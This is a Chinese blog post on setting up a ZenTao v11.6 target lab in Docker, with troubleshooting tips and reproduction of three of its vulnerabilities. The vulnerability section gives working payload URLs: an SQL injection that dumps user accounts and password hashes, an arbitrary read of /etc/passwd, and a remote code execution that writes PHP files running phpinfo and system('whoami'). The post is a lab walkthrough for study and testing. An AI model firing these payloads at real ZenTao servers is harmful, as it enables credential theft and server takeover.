0
点赞
收藏
分享

微信扫一扫

禅道v11.6 基于linux环境下的docker容器搭建的靶场

一、环境搭建

linux环境下的

在docker环境下安装禅道CMS V11.6

docker run --name zentao_v11.6 -p 8084:80 -v /u01/zentao/www:/app/zentaopms -v /u01/zentao/data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -d docker.io/yunwisdom/zentao:v11.6

二、常见问题

1.删除Docker容器镜像报错(同样适用于,在Docker下搭建靶场无法启用的方法)
image.png
不能删除正在运行的容器,需要先停止进程
image.png
再查看时就看到此靶场的进程被删除了
image.png
重新安装
image.png
查看当前进程,现实容器启用
image.png

扩展:Docker下的搭建靶场无法启用其他可能方法
①重启kali,在开启容器

登录后台时密码错误(输入正确密码还是登陆失败)
①可能是8084端口没开
②http://172.0.0.1:8084/install.php(注意标红的位置,进行重新安装以下尝试)

image.png

三、漏洞复现

1.SQL注入

Payload

http://127.0.0.1/api-getModel-api-sql-sql=select+account,password+from+zt_user

Poc访问结果
image.png

2.任意文件读取

Payload

http://127.0.0.1/api-getModel-file-parseCSV-fileName=/etc/passwd

Poc访问结果
image.png

3.RCE

Payload1

http://127.0.0.1/api-getModel-api-getMethod-filePath=1111/1


fileContent=<?php phpinfo()?> 

Poc访问结果
image.png
Payload2

http://127.0.0.1/api-getModel-api-getMethod-filePath=2222/2


fileContent=<?php system('whoami');?>

image.png

举报

相关推荐

0 条评论